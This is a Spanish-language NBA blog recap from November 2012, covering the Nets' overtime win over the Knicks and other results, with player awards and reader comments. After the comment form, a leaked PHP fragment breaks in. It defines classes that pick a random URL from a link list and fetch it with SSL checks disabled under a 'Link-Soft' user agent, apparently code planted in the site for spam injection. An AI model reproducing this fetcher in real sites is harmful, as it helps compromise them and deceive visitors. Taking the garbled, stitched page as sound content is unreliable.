La Crónica: Los Nets se llevan el derby

27 de November de 2012 por TheDeerHunter

Partidazo en el Barclays Center de Brooklyn. Los dos equipos de Nueva York llegaban en buen estado de forma y hubo que tirar de prórroga para decidir el choque aplazado el día inaugural debido al huracán Sandy. No fue suficiente el partidazo de Melo y Chandler, pues en esta ocasión no recibieron ayuda ni de Felton, ni de JR Smith o ni de ningún otro. El alero estrella de NY la tuvo para ganar en el tiempo reglamentario pero esta vez falló. Más repartida estuvo la producción en los locales con el mejor partido de Wallace hasta la fecha, una buena actuación de Deron yun Brook Lopez superlativo. Aseguró, agarraos a la silla, 11 rebotes como 11 soles. Muy destacable también la labor de Jerry Stackhouse, con 4 de 5 en triples. Uno de ellos, por cierto, el que terminaría desequilibrando la balanza definitivamente (89-96).

Fue una bonita jornada cargada de emociones, resultados apretados y sorpresas. Los Bucks remontaron nada menos que 27 puntos en Chicago de la mano de un resucitado Ilyasova, más Udrih y Epke Udoh, tirando por tierra el partidazo de Rip Hamilton (93-92). Los Jazz también lograron la machada ante Denver, permaneciendo invictos en Salt Lake. A destacar el buen rendimiento habitual de Jefferson y Favors, además del buen hacer de Tinsley sustituyendo a Mo Will (103-105).

Batacazo padre de los Blazers en Detroit a pesar de la exhibición de Aldridge. Imparables Knight, Monroe y Kyle Singler en un mal partido de Batum y algo flojo de Lillard (101-108). Por su parte, los Clippers también tropezaron contra Hornets en el Staples, el día que Greivis Vasquez se la liaba a Paul (105-98).

Finalmente palizón de Oklahoma a los Cats (69-114), en un partido infame de Walker y victorias esperadas de Spurs y Grizzlies ante Wizards (118-92) y Cavs (78-84) respectivamente.

PREMIOS

MVP: Otros jugadores habrán cuajado mejores actuaciones individuales pero ninguno condujo a su equipo a la victoria como hizo Greivis Vasquez. El venezolano sigue demostrando que es un jugador a tener en cuenta como demuestran los 25 puntos, 10 asistencias y 6 rebotes que consiguió anoche.

Rookie: El paso por la ACB le ha sentado de fábula a Kyle Singler. 16 puntos, 10 rebotes y 5 asistencias para el rubio de Duke.

Sorpresa: Minutos para Tiago Splitter que el brasileño aprovecha perfecto. Con sus 15 puntos, 12 reboets y 7 asistencias se quedó bien cerquita del triple-doble. Otro que aprovechó los minutos fue Hasheem Thabeet que se fue a dormir con un doble-doble en las espaldas. El dominicano Charlie Villanueva ha vuelto a aparecer en las alineaciones de los Pistons y no se puede decir que lo esté haciendo del todo mal. Ayer fueron 10 puntos, 3 rebotes, 2 asistencias y 2 robos.

Decepción: Vuelve el fantasma de las navidades pasadas. Los Bobcats cuajaron un partido horrible personalizado en los 0 puntos con los que acabó Kemba Walker. Atención también al terrible partido de Blake Griffin, capaz solo de anotar 1 de sus 6 lanzamientos a canastas y acabar con 4 puntos.

Esfuerzo en vano: No se le puede pedir más a la pareja Carmelo AnthonyTyson Chandler: 63 puntos y 23 rebotes entre ambos. Lamarcus Aldridge (32-10) y Caron Butler (33 puntos con 9 triples) fueron otros de los que se quedaron sin premio.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Esteban dice:
    #1

    bien los nets, riendiendo como era de esperar wallace, con el en ese nivel cuidado, sigue en deuda total JO JO, q venia de dos buenos juegos, pero ayer fue una carga mas que una ayuda para su equipo

    como le sucedia a los clippers el año pasado, en juegos duros y finales cerrados, reggie evans juega mas minutos que jordan en aquel momento y ahora que humpries

    sobre LOPEZ, es cierto, no es una gran estrella y tiene limitaciones, pero tan poco vale para todos? para el magic especialmente, el por howard y varias selecciones era un trade mucho mejor que el q terminaron consiguiendo…

      Citar

  2. Ruxixón dice:
    #2

    Muy importante ver cómo se levantan los Bobcats en el próximo partido tras la paliza de los Thunder,hacer un buen partido después de un resultado como este es la mejor manera para evitar los fantasmas del pasado.La verdad es que estadísticamente la paliza ha sido bíblica.

      Citar

  3. melo15 dice:
    #3

    Creo que en este tipo de partidos es donde los Knicks pueden echar mas de menos a Stat, porque aunque no defienda bien es un jugador muy ofensivo y que puede ayudar a Melo en ese apartado. Ya se vio ayer, Chandler tuvo un buen dia pero si Felton y JR fallan los Knicks se quedan demasiado solos.

      Citar

  4. rumbero dice:
    #4

    Un crack el virtuoso de Evans, contra Portland ya fue de lo mejorcito y ayer volvió a ganarse el sueldo. Y Stackhouse otro que se cascó un par de triples cuando quemaba el balón. Lo cierto es que andan muy bien estos Nets, sobretodo por esa defensa que estan mostrando…si hasta Lopez está reboteando y taponando como nunca.
    ¿Marshon Brooks sigue medio lesionado? Está jugando muy muy poquito y con la caraja que lleva el amigo JoJo sería como para darle un buen puñado de minutos

      Citar

  5. Esteban dice:
    #5

    brooks sigue entre algodones, a pesar de que ha jugado algunos minutos, cuando estuvo bien fisicamente demostro con creces ser el sexto hombre revulsivo que esta llamado a ser, recuerdo haberlo visto genial frente a lso wolves, antes de que le remontaran 20 puntos en el ultimo parcial

    los nets estan bien, pero al dia de hoy, como maximo pueden aspirar a una final de conferencia con bastante suerte, el responsable es jo jo, increible el lastre q esta siendo para los suyos, ya no digo que se carge el equipo, por que de hecho no lo necesitan, pero nisiquiera anota sus tiros abiertos y fuerza jugadas para si con pesimos resultados

    con un jo jo en buen nivel son peligrosisimos, se vio ayer, por momentos los NYK no sabian de donde venian los puntos, muchas variantes

    es extraño lo de wallace, un super defensor comno el deja a melo cascarse unos 35 puntos, y varias veces quedo mal parado en la marca, pero otras tantas le robo el balon y lo complico mucho, SI SE PONE FISICAMENTE BIEN, como lo dije en el analisis puede ser el factor X de este equipo, para marcar a melo, pierce y lebron y echar humo tambien en el equipo, ayer 16 puntos, 5 rebotes, 2 robos, 2 tapones y 0 perdidas, un jugador total

      Citar

  6. Kantonyo dice:
    #6

    Siempre he confiado en Greivis Vasquez, desde el primer dia q le vi jugar en la Universidad de Maryland, estuve a punto de perder la esperanza en q triunfara en la NBA, pero ahi está. Y todavia juega sin el descaro y la confianza con la q lo hacia en la universidad… Espero q se sienta más comodo a partir de ahora.

    Llamarme loco, pero me gusta ver jugar a los Bobcats, y lo digo después del mediocre partido de ayer. Kemba es un gran anotador, aunque es muy irregular, MKG es un jugador total y será AllStar casi seguro, la progresion de BJ Mullens es sorprendente, despues de ser el primero de su generacion en el instituto, parecia un bluf tras su paso por la NCAA y Biyombo es un gran defensor al estilo Ibaka.

      Citar

  7. lost dice:
    #7

    La derrota de ayer de los Knicks era de esperar. Yo, seguidor de los Knicks, hasta me sorprendí con el over time. Melo va para el MVP del mes, partidazo el suyo, y Chandler en modo Stoudemire. Coincido con Melo15, los Knicks necesitan a Stat, producción ofensiva por si Novak, Felton o JR. Y a Shumpert, pero eso es secundario. Por cierto, para los que no lo vieron Kidd no jugó, se nota mucho en los últimos minutos y Brewer no jugó la OT.

      Citar

  8. Vader dice:
    #8

    Kidd a parte de los puntos o asistencias suma muchos intangibles….

      Citar

  9. GreenPride dice:
    #9

    Gran partido en New York con un ambientazo para ver el primer derbi neoyorkino del año. Los partidazos de Chandler y Melo no bastaron ante la baja de Kidd y la nula aportación de JR y Novak. Sorprende lo bien que esta Sheed Wallace (que bien le vendría a mis Celtics). En los Nets fenomenal partido de Deron leyendo siempre la defensa de New York y haciendo que Lopez se pusiera las botas y primer gran partido de Wallace haciendo de todo un poco estilo Pippen en los Bulls. Gran aportación de los veteranos Stackhouse y Evans que cada uno en lo suyo se ganan cada dolar que cobran. Los Nets son un equipo muy peligroso y como consigan meter a JoJo en juego aspirantes claros a final de conferencia mínimo.

      Citar

  10. MagicJohnson32 dice:
    #10

    Joer cómo empiezan los Cavs: Pargo + Gee + Thompson + Miles + Zeller = 0 de 16 en tiros. Llevan 18 puntos mediado el segundo cuarto… y los Suns solo ganan por 11.

      Citar

  11. nba dice:
    #11

    Se busca equipo interesado en asumir contrato de alapivot español, gran conocimiento del juego, baja condicion fisica, subcampeon olimpico, campeon europeo , rookie of the year y barbudo para mas señas, razon los Lakers, preguntar por Kupchak

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>